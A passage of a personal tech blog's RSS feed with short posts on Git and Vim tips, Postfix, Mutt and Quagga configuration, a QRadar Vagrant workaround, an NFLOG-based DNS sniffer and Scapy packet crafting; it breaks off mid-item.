  4138.    <content:encoded><![CDATA[<p><a href="" title="The Comet Is Coming - Summon The Fire - YouTube">The Comet Is Coming - Summon The Fire</a></p>
  4139. <p><a href="" title="The Comet Is Coming">The Comet Is Coming</a> is a 21st century style Jazz band.<br>
  4140. Discovered at the <a href="" title="Zurich Jazznojazz Festival 2019">Jazznojazz</a> festival :-)</p>
  4141. ]]></content:encoded>
  4142.  </item>
  4144.  <item>
  4145.    <title>More productive Git</title>
  4146.    <link></link>
  4147.    <guid isPermaLink="true"></guid>
  4148.    <dc:creator>Andreas Jaggi</dc:creator>
  4149.    <creativeCommons:license></creativeCommons:license>
  4150.    <pubDate>Sat, 25 May 2019 07:47:00 +0200</pubDate>
  4151.    <category domain="">Coding</category>
  4152.    <description><![CDATA[<p><a href="" title="More productive Git">More productive Git</a> &mdash; a short article from <a href="" title="@katar">James Turnbull</a> with 'Tips for acquiring Git super powers'.</p>
  4153. <p>TL;DR:</p>
  4154. <ul>
  4155. <li><code>git reset &lt;filename&gt;</code></li>
  4156. <li><code>git cherry-pick &lt;commitid&gt;</code></li>
  4157. <li><code>git commit --amend</code></li>
  4158. <li><code>git stash</code></li>
  4159. <li><code>git log --stat</code></li>
  4160. <li><code>git bisect</code></li>
  4161. </ul>
  4162. ]]></description>
  4163.    <content:encoded><![CDATA[<p><a href="" title="More productive Git">More productive Git</a> &mdash; a short article from <a href="" title="@katar">James Turnbull</a> with 'Tips for acquiring Git super powers'.</p>
  4164. <p>TL;DR:</p>
  4165. <ul>
  4166. <li><code>git reset &lt;filename&gt;</code></li>
  4167. <li><code>git cherry-pick &lt;commitid&gt;</code></li>
  4168. <li><code>git commit --amend</code></li>
  4169. <li><code>git stash</code></li>
  4170. <li><code>git log --stat</code></li>
  4171. <li><code>git bisect</code></li>
  4172. </ul>
  4173. ]]></content:encoded>
  4174.  </item>
  4176.  <item>
  4177.    <title>Engineering Management</title>
  4178.    <link></link>
  4179.    <guid isPermaLink="true"></guid>
  4180.    <dc:creator>Andreas Jaggi</dc:creator>
  4181.    <creativeCommons:license></creativeCommons:license>
  4182.    <pubDate>Sun, 06 Jan 2019 13:21:00 +0100</pubDate>
  4183.    <category domain="">Coding</category>
  4184.    <description><![CDATA[<p><a href="" title="Engineering Management: The Pendulum Or The Ladder">Engineering Management: The Pendulum Or The Ladder</a> &mdash; a well written article from <a href="" title="Charity Majors">Charity Majors</a> about the non-trivial entanglement between engineering and management, explaining how doing everything at the same time does lead to unhappy/un-fulfilled people. Also worth reading in this context is the prequel article <a href="" title="The Engineer/Manager Pendulum">The Engineer/Manager Pendulum</a>.</p>
  4185. ]]></description>
  4186.    <content:encoded><![CDATA[<p><a href="" title="Engineering Management: The Pendulum Or The Ladder">Engineering Management: The Pendulum Or The Ladder</a> &mdash; a well written article from <a href="" title="Charity Majors">Charity Majors</a> about the non-trivial entanglement between engineering and management, explaining how doing everything at the same time does lead to unhappy/un-fulfilled people. Also worth reading in this context is the prequel article <a href="" title="The Engineer/Manager Pendulum">The Engineer/Manager Pendulum</a>.</p>
  4187. ]]></content:encoded>
  4188.  </item>
  4190.  <item>
  4191.    <title>Blogroll cleanup</title>
  4192.    <link></link>
  4193.    <guid isPermaLink="true"></guid>
  4194.    <dc:creator>Andreas Jaggi</dc:creator>
  4195.    <creativeCommons:license></creativeCommons:license>
  4196.    <pubDate>Sun, 06 Jan 2019 12:55:00 +0100</pubDate>
  4197.    <category domain="">Misc</category>
  4198.    <description><![CDATA[<p>As some links on my blogroll start to turn into 404 errors it's time to do some cleanup and also to bring in some fresh blood :-)</p>
  4199. <p>Removed:</p>
  4200. <ul>
  4201. <li><a href="" title="mezzoblue">mezzoblue</a></li>
  4202. <li><a href="" title="Dave Shea">Dave Shea</a></li>
  4203. <li><a href="" title="Pepilog">Pepilog</a></li>
  4204. <li><a href="" title="Elfengleich">e.loge</a></li>
  4205. <li><a href="" title="EDV">EDV</a></li>
  4206. <li><a href="" title=""></a></li>
  4207. <li><a href="" title="Code Candies">Code Candies</a></li>
  4208. <li><a href="" title="thePacketGeek">thePacketGeek</a></li>
  4209. <li><a href="" title="lovfoood">lovfoood</a></li>
  4210. </ul>
  4211. <p>Added:</p>
  4212. <ul>
  4213. <li><a href="" title=""></a></li>
  4214. </ul>
  4215. ]]></description>
  4216.    <content:encoded><![CDATA[<p>As some links on my blogroll start to turn into 404 errors it's time to do some cleanup and also to bring in some fresh blood :-)</p>
  4217. <p>Removed:</p>
  4218. <ul>
  4219. <li><a href="" title="mezzoblue">mezzoblue</a></li>
  4220. <li><a href="" title="Dave Shea">Dave Shea</a></li>
  4221. <li><a href="" title="Pepilog">Pepilog</a></li>
  4222. <li><a href="" title="Elfengleich">e.loge</a></li>
  4223. <li><a href="" title="EDV">EDV</a></li>
  4224. <li><a href="" title=""></a></li>
  4225. <li><a href="" title="Code Candies">Code Candies</a></li>
  4226. <li><a href="" title="thePacketGeek">thePacketGeek</a></li>
  4227. <li><a href="" title="lovfoood">lovfoood</a></li>
  4228. </ul>
  4229. <p>Added:</p>
  4230. <ul>
  4231. <li><a href="" title=""></a></li>
  4232. </ul>
  4233. ]]></content:encoded>
  4234.  </item>
  4236.  <item>
  4237.    <title>New Year - New Vim Trick</title>
  4238.    <link></link>
  4239.    <guid isPermaLink="true"></guid>
  4240.    <dc:creator>Andreas Jaggi</dc:creator>
  4241.    <creativeCommons:license></creativeCommons:license>
  4242.    <pubDate>Tue, 01 Jan 2019 22:24:00 +0100</pubDate>
  4243.    <category domain="">Coding</category>
  4244.    <description><![CDATA[<p>Happy 2019! I have learnt a new <a href="" title="Vim - the ubiquitous text editor">Vim</a> trick:<br>
  4245. When searching for some pattern with <kbd>/</kbd> (eg. <kbd>/mystring</kbd>), often the next step is to perform a replacement command.
  4246. Now instead of re-typing the whole string, you can directly enter the substitution command with an emtpy search-pattern (<kbd>:%s//newstring/</kbd>), Vim then automatically re-uses the previous search pattern.
  4247. </p>
  4248. <p>(<a href="" title="What's your favorite Vim trick?">via</a>)</p>
  4249. ]]></description>
  4250.    <content:encoded><![CDATA[<p>Happy 2019! I have learnt a new <a href="" title="Vim - the ubiquitous text editor">Vim</a> trick:<br>
  4251. When searching for some pattern with <kbd>/</kbd> (eg. <kbd>/mystring</kbd>), often the next step is to perform a replacement command.
  4252. Now instead of re-typing the whole string, you can directly enter the substitution command with an emtpy search-pattern (<kbd>:%s//newstring/</kbd>), Vim then automatically re-uses the previous search pattern.
  4253. </p>
  4254. <p>(<a href="" title="What's your favorite Vim trick?">via</a>)</p>
  4255. ]]></content:encoded>
  4256.  </item>
  4258.  <item>
  4259.    <title>The Swiss Army Knife of Hashmaps</title>
  4260.    <link></link>
  4261.    <guid isPermaLink="true"></guid>
  4262.    <dc:creator>Andreas Jaggi</dc:creator>
  4263.    <creativeCommons:license></creativeCommons:license>
  4264.    <pubDate>Sat, 08 Dec 2018 06:41:00 +0100</pubDate>
  4265.    <category domain="">Coding</category>
  4266.    <description><![CDATA[<p><a href="" title="The Swiss Army Knife of Hashmaps">The Swiss Army Knife of Hashmaps</a> &mdash; a very nice article from <a href="" title="Arrow of Code">Ravi Shankar</a> explaining how <a href="" title="Matt Kulukundis - Designing a Fast, Efficient, Cache-friendly Hash Table, Step by Step">Google's SwissTable</a> concept was implemented for Rust.</p>
  4267. ]]></description>
  4268.    <content:encoded><![CDATA[<p><a href="" title="The Swiss Army Knife of Hashmaps">The Swiss Army Knife of Hashmaps</a> &mdash; a very nice article from <a href="" title="Arrow of Code">Ravi Shankar</a> explaining how <a href="" title="Matt Kulukundis - Designing a Fast, Efficient, Cache-friendly Hash Table, Step by Step">Google's SwissTable</a> concept was implemented for Rust.</p>
  4269. ]]></content:encoded>
  4270.  </item>
  4272.  <item>
  4273.    <title>Run QRadar CE on Mac OS X with Vagrant</title>
  4274.    <link></link>
  4275.    <guid isPermaLink="true"></guid>
  4276.    <dc:creator>Andreas Jaggi</dc:creator>
  4277.    <creativeCommons:license></creativeCommons:license>
  4278.    <pubDate>Sun, 05 Aug 2018 13:18:00 +0200</pubDate>
  4279.    <category domain="">Networking</category>
  4280.    <description><![CDATA[<p>The Vagrant file provided by IBM for running <a href="" title="QRadar Community Edition">QRadar Community Edition</a> on Mac OS X currently does not work properly. It fails with the following error:</p>
  4281. <pre>Failure: repodata/repomd.xml from centos-gluster38: [Errno 256] No more mirrors to try.
  4282. [Errno 14] HTTP Error 404</pre>
  4283. <p>The problem is that gluster3.8 was moved out of this CentOS repository and now the download fails.
  4284. But the gluster3.8 RPMs are also provided with the QRadar CE installation ISO file.</p>
  4285. <p>Based on the workaround <a href="">described here</a>, I've extended the IBM provided Vagrantfile so that the RPMs are taken from the ISO file instead of the CentOS repository.
  4286. With the <a href="" title="QRadar CE Vagrantfile">modified Vagrantfile</a> the automatic provisioning script no longer fails.</p>
  4288. <p>The instructions for running QRadar CE with Vagrant now look like this:</p>
  4289. <ol><li>Download the zipfile with the original Vagrantfile and the accompanying helper files from the IBM website: <a href="" title=""></a></li>
  4290. <li>Create a folder and extract the zipfile:<br>
  4291. <pre>mkdir community_edition
  4292. unzip -d community_edition/</pre></li>
  4293. <li>Download the modified Vagrantfile and overwrite the original one:<br>
  4294. <pre>curl -o community_edition/Vagrantfile</pre></li>
  4295. <li>Make sure you have the requried Vagrant plugins installed:<br>
  4296. <pre>vagrant plugin install vagrant-disksize
  4297. vagrant plugin install vagrant-reload</pre></li>
  4298. <li>Make sure you have the QRadar CE ISO file (downloaded from the IBM website) in the same folder as the Vagrantfile:<br>
  4299. <pre>cp QRadarCE.iso community_edition/</pre></li>
  4300. <li>Create the auto_install file to automatically install QRadar:<br>
  4301. <pre>touch community_edition/auto_install</pre></li>
  4302. <li>Accept the EULA by adding the corresponding setup parameter in the Vagrantfile:<br>
  4303. Edit the Vagrantfile and add the --accept-eula argument to /media/cdrom/setup --no-screen to automatically accept the EULA</li>
  4304. <li>Change into the folder and start the QRadar installation (takes about 1 hour):<br>
  4305. <pre>cd community_edition
  4306. vagrant up</pre></li></ol>
  4307. ]]></description>
  4308.    <content:encoded><![CDATA[<p>The Vagrant file provided by IBM for running <a href="" title="QRadar Community Edition">QRadar Community Edition</a> on Mac OS X currently does not work properly. It fails with the following error:</p>
  4309. <pre>Failure: repodata/repomd.xml from centos-gluster38: [Errno 256] No more mirrors to try.
  4310. [Errno 14] HTTP Error 404</pre>
  4311. <p>The problem is that gluster3.8 was moved out of this CentOS repository and now the download fails.
  4312. But the gluster3.8 RPMs are also provided with the QRadar CE installation ISO file.</p>
  4313. <p>Based on the workaround <a href="">described here</a>, I've extended the IBM provided Vagrantfile so that the RPMs are taken from the ISO file instead of the CentOS repository.
  4314. With the <a href="" title="QRadar CE Vagrantfile">modified Vagrantfile</a> the automatic provisioning script no longer fails.</p>
  4316. <p>The instructions for running QRadar CE with Vagrant now look like this:</p>
  4317. <ol><li>Download the zipfile with the original Vagrantfile and the accompanying helper files from the IBM website: <a href="" title=""></a></li>
  4318. <li>Create a folder and extract the zipfile:<br>
  4319. <pre>mkdir community_edition
  4320. unzip -d community_edition/</pre></li>
  4321. <li>Download the modified Vagrantfile and overwrite the original one:<br>
  4322. <pre>curl -o community_edition/Vagrantfile</pre></li>
  4323. <li>Make sure you have the requried Vagrant plugins installed:<br>
  4324. <pre>vagrant plugin install vagrant-disksize
  4325. vagrant plugin install vagrant-reload</pre></li>
  4326. <li>Make sure you have the QRadar CE ISO file (downloaded from the IBM website) in the same folder as the Vagrantfile:<br>
  4327. <pre>cp QRadarCE.iso community_edition/</pre></li>
  4328. <li>Create the auto_install file to automatically install QRadar:<br>
  4329. <pre>touch community_edition/auto_install</pre></li>
  4330. <li>Accept the EULA by adding the corresponding setup parameter in the Vagrantfile:<br>
  4331. Edit the Vagrantfile and add the --accept-eula argument to /media/cdrom/setup --no-screen to automatically accept the EULA</li>
  4332. <li>Change into the folder and start the QRadar installation (takes about 1 hour):<br>
  4333. <pre>cd community_edition
  4334. vagrant up</pre></li></ol>
  4335. ]]></content:encoded>
  4336.  </item>
  4338.  <item>
  4339.    <title>Raid The Arcade</title>
  4340.    <link></link>
  4341.    <guid isPermaLink="true"></guid>
  4342.    <dc:creator>Andreas Jaggi</dc:creator>
  4343.    <creativeCommons:license></creativeCommons:license>
  4344.    <pubDate>Thu, 19 Jul 2018 15:31:00 +0200</pubDate>
  4345.    <category domain="">Music</category>
  4346.    <description><![CDATA[<p><img src="" alt="Raid The Arcade Mix" width="450" height="535"></p>
  4347. <p><a href="" title="Ernest Cline - Armada">Ernest Cline - Armada</a></p>
  4348. ]]></description>
  4349.    <content:encoded><![CDATA[<p><img src="" alt="Raid The Arcade Mix" width="450" height="535"></p>
  4350. <p><a href="" title="Ernest Cline - Armada">Ernest Cline - Armada</a></p>
  4351. ]]></content:encoded>
  4352.  </item>
  4354.  <item>
  4355.    <title>Benjojo</title>
  4356.    <link></link>
  4357.    <guid isPermaLink="true"></guid>
  4358.    <dc:creator>Andreas Jaggi</dc:creator>
  4359.    <creativeCommons:license></creativeCommons:license>
  4360.    <pubDate>Sat, 14 Apr 2018 07:16:00 +0200</pubDate>
  4361.    <category domain="">Misc</category>
  4362.    <description><![CDATA[<p>Added another interesting blog to the Links: <a href="" title="Benjojo's Blog"></a></p>
  4364. <p>Ben builds and writes about a lot of funny small projects:</p>
  4365. <ul>
  4366. <li><a href="" title="DNSFS. Store your files in others DNS resolver caches">Storing files in DNS caches</a></li>
  4367. <li><a href="" title="Encoding data in dubstep drops">Encoding data in dubstep music</a></li>
  4368. <li><a href="" title="Giving every Tor Hidden Service a IPv6 address">Building an IPv6-to-Tor gateway</a></li>
  4369. <li><a href="" title="TOTP SSH port fluxing">Switching SSH port based on a time-based token</a></li>
  4370. </ul>
  4371. ]]></description>
  4372.    <content:encoded><![CDATA[<p>Added another interesting blog to the Links: <a href="" title="Benjojo's Blog"></a></p>
  4374. <p>Ben builds and writes about a lot of funny small projects:</p>
  4375. <ul>
  4376. <li><a href="" title="DNSFS. Store your files in others DNS resolver caches">Storing files in DNS caches</a></li>
  4377. <li><a href="" title="Encoding data in dubstep drops">Encoding data in dubstep music</a></li>
  4378. <li><a href="" title="Giving every Tor Hidden Service a IPv6 address">Building an IPv6-to-Tor gateway</a></li>
  4379. <li><a href="" title="TOTP SSH port fluxing">Switching SSH port based on a time-based token</a></li>
  4380. </ul>
  4381. ]]></content:encoded>
  4382.  </item>
  4384.  <item>
  4385.    <title>Exclude domain from unknown sender check</title>
  4386.    <link></link>
  4387.    <guid isPermaLink="true"></guid>
  4388.    <dc:creator>Andreas Jaggi</dc:creator>
  4389.    <creativeCommons:license></creativeCommons:license>
  4390.    <pubDate>Wed, 04 Apr 2018 23:03:00 +0200</pubDate>
  4391.    <category domain="">Linux</category>
  4392.    <description><![CDATA[<p><a href="" title="The Postfix Home Page">Postfix</a> provides the <a href="" title="Postfix Configuration Parameters: reject_unknown_sender_domain">reject_unknown_sender_domain</a> check which allows to only accept incoming e-mails sent from domains which actually exist.</p>
  4393. <p>Unfortunately there exists this one external service which uses a non-existing subdomain to send their notification e-mails. Thus all their notifications get rejected.</p>
  4394. <p>The following configuration allows to keep the reject_unknown_sender_domain check in place, but to exclude a specific domain from this check.</p>
  4396. <pre>
  4397. # snippet in
  4398. smtpd_sender_restrictions = check_sender_access pcre:/etc/postfix/sender_domain_verification
  4399. </pre>
  4401. <pre>
  4402. # exclude regex in sender_domain_verification
  4403. !/@domain\.to\.exclude\.com$/ reject_unknown_sender_domain
  4404. </pre>
  4406. <p>Your distribution might ship Postfix support for pcre matches in a dedicated package which needs to be installed separately (in the case of Debian you need to install the postfix-pcre package).</p>
  4407. ]]></description>
  4408.    <content:encoded><![CDATA[<p><a href="" title="The Postfix Home Page">Postfix</a> provides the <a href="" title="Postfix Configuration Parameters: reject_unknown_sender_domain">reject_unknown_sender_domain</a> check which allows to only accept incoming e-mails sent from domains which actually exist.</p>
  4409. <p>Unfortunately there exists this one external service which uses a non-existing subdomain to send their notification e-mails. Thus all their notifications get rejected.</p>
  4410. <p>The following configuration allows to keep the reject_unknown_sender_domain check in place, but to exclude a specific domain from this check.</p>
  4412. <pre>
  4413. # snippet in
  4414. smtpd_sender_restrictions = check_sender_access pcre:/etc/postfix/sender_domain_verification
  4415. </pre>
  4417. <pre>
  4418. # exclude regex in sender_domain_verification
  4419. !/@domain\.to\.exclude\.com$/ reject_unknown_sender_domain
  4420. </pre>
  4422. <p>Your distribution might ship Postfix support for pcre matches in a dedicated package which needs to be installed separately (in the case of Debian you need to install the postfix-pcre package).</p>
  4423. ]]></content:encoded>
  4424.  </item>
  4426.  <item>
  4427.    <title>Blogroll update</title>
  4428.    <link></link>
  4429.    <guid isPermaLink="true"></guid>
  4430.    <dc:creator>Andreas Jaggi</dc:creator>
  4431.    <creativeCommons:license></creativeCommons:license>
  4432.    <pubDate>Sun, 01 Apr 2018 21:52:00 +0200</pubDate>
  4433.    <category domain="">Misc</category>
  4434.    <description><![CDATA[<p>Added the following blogs to the Links:</p>
  4435. <ul>
  4436. <li><a href="" title="Henrik Warne&#039;s blog | Thoughts on programming&#8230;">Thoughts on programming</a></li>
  4437. <li><a href="" title="Evan Klitzke"></a></li>
  4438. <li><a href="" title="rachelbythebay : Writing"></a></li>
  4439. </ul>
  4440. <p>Seems like the blog/RSS thing is getting traction again: <a href="" title="After years of letting algorithms make up our minds for us, the time is right to go back to basics.">It's Time for an RSS Revival</a> (<a href="" title="It&#x27;s time to head back to RSS? | Hacker News">via</a>)</p>
  4441. ]]></description>
  4442.    <content:encoded><![CDATA[<p>Added the following blogs to the Links:</p>
  4443. <ul>
  4444. <li><a href="" title="Henrik Warne&#039;s blog | Thoughts on programming&#8230;">Thoughts on programming</a></li>
  4445. <li><a href="" title="Evan Klitzke"></a></li>
  4446. <li><a href="" title="rachelbythebay : Writing"></a></li>
  4447. </ul>
  4448. <p>Seems like the blog/RSS thing is getting traction again: <a href="" title="After years of letting algorithms make up our minds for us, the time is right to go back to basics.">It's Time for an RSS Revival</a> (<a href="" title="It&#x27;s time to head back to RSS? | Hacker News">via</a>)</p>
  4449. ]]></content:encoded>
  4450.  </item>
  4452.  <item>
  4453.    <title>nflog_sniff extended with C++ implementation</title>
  4454.    <link></link>
  4455.    <guid isPermaLink="true"></guid>
  4456.    <dc:creator>Andreas Jaggi</dc:creator>
  4457.    <creativeCommons:license></creativeCommons:license>
  4458.    <pubDate>Sat, 05 Dec 2015 11:58:00 +0100</pubDate>
  4459.    <category domain="">Networking</category>
  4460.    <description><![CDATA[<p>With nflog_sniffer.cpp I've just added a C++ implementation to the <a href="" title="x-way/nflog_sniff">nflog_sniff</a> repository.</p>
  4461. <p>It uses the lean (and apparently also very fast) <a href="" title="C++ packet sniffing and crafting library - libtins">libtins</a> library.</p>
  4462. ]]></description>
  4463.    <content:encoded><![CDATA[<p>With nflog_sniffer.cpp I've just added a C++ implementation to the <a href="" title="x-way/nflog_sniff">nflog_sniff</a> repository.</p>
  4464. <p>It uses the lean (and apparently also very fast) <a href="" title="C++ packet sniffing and crafting library - libtins">libtins</a> library.</p>
  4465. ]]></content:encoded>
  4466.  </item>
  4468.  <item>
  4469.    <title>DNS packet sniffing with NFLOG and Perl/Python</title>
  4470.    <link></link>
  4471.    <guid isPermaLink="true"></guid>
  4472.    <dc:creator>Andreas Jaggi</dc:creator>
  4473.    <creativeCommons:license></creativeCommons:license>
  4474.    <pubDate>Fri, 04 Dec 2015 20:10:00 +0100</pubDate>
  4475.    <category domain="">Networking</category>
  4476.    <description><![CDATA[<p>The <a href="" title="chifflier/nflog-bindings">nflog-bindings</a> from Pierre Chifflier make it trivially easy to write a passive packet sniffer which can be controlled via iptables and listens to traffic on multiple interfaces at the same time.</p>
  4477. <p>As a little exercise I have written a simple DNS packet sniffer, once in Perl and once in Python:</p>
  4478. <script src=""></script>
  4479. <script src=""></script>
  4480. <p>To use the sniffer, first create an iptables rule like this: iptables -I INPUT -p udp --sport 53 -j NFLOG --nflog-group 123</p>
  4481. <p>Then start one of the sniffer scripts and observe the extracted DNS queries :-)</p>
  4482. <p>For a more convenient download I've also put the scripts in a proper Github repository: <a href="" title="x-way/nflog_sniff">nflog_sniff</a></p>
  4483. ]]></description>
  4484.    <content:encoded><![CDATA[<p>The <a href="" title="chifflier/nflog-bindings">nflog-bindings</a> from Pierre Chifflier make it trivially easy to write a passive packet sniffer which can be controlled via iptables and listens to traffic on multiple interfaces at the same time.</p>
  4485. <p>As a little exercise I have written a simple DNS packet sniffer, once in Perl and once in Python:</p>
  4486. <script src=""></script>
  4487. <script src=""></script>
  4488. <p>To use the sniffer, first create an iptables rule like this: iptables -I INPUT -p udp --sport 53 -j NFLOG --nflog-group 123</p>
  4489. <p>Then start one of the sniffer scripts and observe the extracted DNS queries :-)</p>
  4490. <p>For a more convenient download I've also put the scripts in a proper Github repository: <a href="" title="x-way/nflog_sniff">nflog_sniff</a></p>
  4491. ]]></content:encoded>
  4492.  </item>
  4494.  <item>
  4495.    <title>Mutt Homebrew Formula extended with indexcolor patch</title>
  4496.    <link></link>
  4497.    <guid isPermaLink="true"></guid>
  4498.    <dc:creator>Andreas Jaggi</dc:creator>
  4499.    <creativeCommons:license></creativeCommons:license>
  4500.    <pubDate>Tue, 03 Nov 2015 20:18:00 +0100</pubDate>
  4501.    <category domain="">Linux</category>
  4502.    <description><![CDATA[<p>I've just added the <a href="" title="A mutt patch for a more colorful index">indexcolor</a> patch to my <a href="" title="x-way/homebrew-mutt">Mutt 1.5.24 Homebrew Formula</a>.</p>
  4503. <p>To use this Formula just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch --with-indexcolor-patch</kbd> to install Mutt 1.5.24 with trash_folder and indexcolor support.</p>
  4504. ]]></description>
  4505.    <content:encoded><![CDATA[<p>I've just added the <a href="" title="A mutt patch for a more colorful index">indexcolor</a> patch to my <a href="" title="x-way/homebrew-mutt">Mutt 1.5.24 Homebrew Formula</a>.</p>
  4506. <p>To use this Formula just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch --with-indexcolor-patch</kbd> to install Mutt 1.5.24 with trash_folder and indexcolor support.</p>
  4507. ]]></content:encoded>
  4508.  </item>
  4510.  <item>
  4511.    <title>Homebrew Tap for Mutt 1.5.24 with trash_folder patch</title>
  4512.    <link></link>
  4513.    <guid isPermaLink="true"></guid>
  4514.    <dc:creator>Andreas Jaggi</dc:creator>
  4515.    <creativeCommons:license></creativeCommons:license>
  4516.    <pubDate>Wed, 23 Sep 2015 22:31:00 +0200</pubDate>
  4517.    <category domain="">Linux</category>
  4518.    <description><![CDATA[<p>At work I'm a quite avid user of <a href="" title="The Mutt E-Mail Client">Mutt</a>. Unfortunately the upgrade to the recently released version 1.5.24 did not go over as smooth as expected.</p>
  4519. <p>I'm using <a href="" title="Homebrew - The missing package manager for OS X">Homebrew</a> to install Mutt on Mac OS X, and even though there is an updated version in the official Homebrew repository, it no longer comes with the trash_folder patch (it fails to apply against the 1.5.24 source tree and was thus removed).</p>
  4520. <p>In order to build the new Mutt version with the trash_folder support, I updated the patch for version 1.5.24: <a href="" title="mutt-1.5.24-trash_folder.diff">mutt-1.5.24-trash_folder.diff</a>.</p>
  4521. <p>The official Homebrew repository prefers unpatched packages and encourages the creation of independent "Taps" (package repositories) for patched packages. Thus I also created my own Homebrew Tap which contains the 1.5.24 version of Mutt with the updated trash_folder patch: <a href="" title="x-way/homebrew-mutt">x-way/homebrew-mutt</a>.</p>
  4522. <p>To use this Tap just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch</kbd> to install Mutt 1.5.24 with trash_folder support. Cheers!</p>
  4523. ]]></description>
  4524.    <content:encoded><![CDATA[<p>At work I'm a quite avid user of <a href="" title="The Mutt E-Mail Client">Mutt</a>. Unfortunately the upgrade to the recently released version 1.5.24 did not go over as smooth as expected.</p>
  4525. <p>I'm using <a href="" title="Homebrew - The missing package manager for OS X">Homebrew</a> to install Mutt on Mac OS X, and even though there is an updated version in the official Homebrew repository, it no longer comes with the trash_folder patch (it fails to apply against the 1.5.24 source tree and was thus removed).</p>
  4526. <p>In order to build the new Mutt version with the trash_folder support, I updated the patch for version 1.5.24: <a href="" title="mutt-1.5.24-trash_folder.diff">mutt-1.5.24-trash_folder.diff</a>.</p>
  4527. <p>The official Homebrew repository prefers unpatched packages and encourages the creation of independent "Taps" (package repositories) for patched packages. Thus I also created my own Homebrew Tap which contains the 1.5.24 version of Mutt with the updated trash_folder patch: <a href="" title="x-way/homebrew-mutt">x-way/homebrew-mutt</a>.</p>
  4528. <p>To use this Tap just type <kbd>brew tap x-way/mutt</kbd> followed by <kbd>brew install x-way/mutt/mutt --with-trash-patch</kbd> to install Mutt 1.5.24 with trash_folder support. Cheers!</p>
  4529. ]]></content:encoded>
  4530.  </item>
  4532.  <item>
  4533.    <title>Puppet Infrastructure 2015</title>
  4534.    <link></link>
  4535.    <guid isPermaLink="true"></guid>
  4536.    <dc:creator>Andreas Jaggi</dc:creator>
  4537.    <creativeCommons:license></creativeCommons:license>
  4538.    <pubDate>Sat, 15 Aug 2015 06:47:00 +0200</pubDate>
  4539.    <category domain="">Linux</category>
  4540.    <description><![CDATA[<p><a href="" title="Puppet Infrastructure 2015">Puppet Infrastructure 2015</a></p>
  4541. ]]></description>
  4542.    <content:encoded><![CDATA[<p><a href="" title="Puppet Infrastructure 2015">Puppet Infrastructure 2015</a></p>
  4543. ]]></content:encoded>
  4544.  </item>
  4546.  <item>
  4547.    <title>Downgrade Quagga on Debian 8</title>
  4548.    <link></link>
  4549.    <guid isPermaLink="true"></guid>
  4550.    <dc:creator>Andreas Jaggi</dc:creator>
  4551.    <creativeCommons:license></creativeCommons:license>
  4552.    <pubDate>Wed, 12 Aug 2015 04:11:00 +0200</pubDate>
  4553.    <category domain="">Linux</category>
  4554.    <description><![CDATA[<p>The <a href="" title="Quagga Routing Suite">Quagga</a> version in Debian 8 (v0.99.23.1) suffers from a <a href="" title="quagga: ospf6d no loner updates route after upgrade to Jessie">bug in ospf6d</a>, which causes that no IPv6 routes are exchanged via point-to-point interfaces.</p>
  4556. <p>In order to workaround this problem (and re-establish IPv6 connectivity), a downgrade of the quagga package can be done.<br>
  4557. For this we add the 'oldstable' entry to sources.list and pin the quagga package to the old version.</p>
  4559. <p>Entry to add to /etc/apt/sources.list:</p>
  4560. <pre>deb oldstable main</pre>
  4561. <p>Entry to add to /etc/apt/preferences:</p>
  4562. <pre>Package: quagga
  4563. Pin: version 0.99.22.*
  4564. Pin-Priority: 1001</pre>
  4566. <p>After the entries have been added, run <kbd>apt-get update</kbd> followed by <kbd>apt-get install quagga</kbd> to downgrade to the old quagga package.</p>
  4567. ]]></description>
  4568.    <content:encoded><![CDATA[<p>The <a href="" title="Quagga Routing Suite">Quagga</a> version in Debian 8 (v0.99.23.1) suffers from a <a href="" title="quagga: ospf6d no loner updates route after upgrade to Jessie">bug in ospf6d</a>, which causes that no IPv6 routes are exchanged via point-to-point interfaces.</p>
  4570. <p>In order to workaround this problem (and re-establish IPv6 connectivity), a downgrade of the quagga package can be done.<br>
  4571. For this we add the 'oldstable' entry to sources.list and pin the quagga package to the old version.</p>
  4573. <p>Entry to add to /etc/apt/sources.list:</p>
  4574. <pre>deb oldstable main</pre>
  4575. <p>Entry to add to /etc/apt/preferences:</p>
  4576. <pre>Package: quagga
  4577. Pin: version 0.99.22.*
  4578. Pin-Priority: 1001</pre>
  4580. <p>After the entries have been added, run <kbd>apt-get update</kbd> followed by <kbd>apt-get install quagga</kbd> to downgrade to the old quagga package.</p>
  4581. ]]></content:encoded>
  4582.  </item>
  4584.  <item>
  4585.    <title>fsociety00.dat</title>
  4586.    <link></link>
  4587.    <guid isPermaLink="true"></guid>
  4588.    <dc:creator>Andreas Jaggi</dc:creator>
  4589.    <creativeCommons:license></creativeCommons:license>
  4590.    <pubDate>Sun, 19 Jul 2015 23:44:00 +0200</pubDate>
  4591.    <category domain="">Misc</category>
  4592.    <description><![CDATA[<p><a href="" title="fsociety00.dat" rel="nofollow">fsociety00.dat</a></p>
  4593. ]]></description>
  4594.    <content:encoded><![CDATA[<p><a href="" title="fsociety00.dat" rel="nofollow">fsociety00.dat</a></p>
  4595. ]]></content:encoded>
  4596.  </item>
  4598.  <item>
  4599.    <title>Scapy and IP Options</title>
  4600.    <link></link>
  4601.    <guid isPermaLink="true"></guid>
  4602.    <dc:creator>Andreas Jaggi</dc:creator>
  4603.    <creativeCommons:license></creativeCommons:license>
  4604.    <pubDate>Sun, 12 Jul 2015 23:56:00 +0200</pubDate>
  4605.    <category domain="">Networking</category>
  4606.    <description><![CDATA[<p>Create packets with custom IPv4 IP Option fields using <a href="" title="Scapy is a powerful interactive packet manipulation program">Scapy</a>:</p>
  4607. <pre>
  4608. &gt;&gt;&gt; packet=IP(src="",dst="",options=[IPOption('%s%s'%('\x86\x28','a'*38))])
  4609. &gt;&gt;&gt; ls(packet)
  4610. version    : BitField             = 4               (4)
  4611. ihl        : BitField             = None            (None)
  4612. tos        : XByteField           = 0               (0)
  4613. len        : ShortField           = None            (None)
  4614. id         : ShortField           = 1               (1)
  4615. flags      : FlagsField           = 0               (0)
  4616. frag       : BitField             = 0               (0)
  4617. ttl        : ByteField            = 64              (64)
  4618. proto      : ByteEnumField        = 0               (0)
  4619. chksum     : XShortField          = None            (None)
  4620. src        : Emph                 = ''   (None)
  4621. dst        : Emph                 = ''   ('')
